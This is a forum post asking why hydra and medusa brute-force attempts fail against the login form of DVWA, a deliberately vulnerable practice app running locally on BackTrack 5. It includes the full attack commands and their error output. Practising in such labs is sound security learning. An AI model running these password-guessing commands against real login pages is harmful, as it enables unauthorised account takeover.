hi, i installed last version of dvwa (1.0.7 from www.dvwa.co.uk) on bt5r2 and everything works perfectly, except that the brute force module seem to be impossible, low security too, infact both hydra and medusa fail, i've yet asked but with no answare, so can someone explain me how to do?
medusa -h 127.0.0.1 -u admin -p password -M web-form -m FORM:"dvwa/vulnerabilities/brute/index.php" -m DENY-SIGNAL:"incorrect" -m FORM-DATA:"get?username=&password=&Login=Login"
ERROR: The answer was NOT successfully received, understood, and accepted: error code 302
hydra -s 80 -l admin -P pass -f 127.0.0.1 http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:incorrect"
[STATUS] 5.00 tries/min, 5 tries in 00:01h, 0 todo in 00:01h
[STATUS] 2.50 tries/min, 5 tries in 00:02h, 0 todo in 00:01h
thx a lot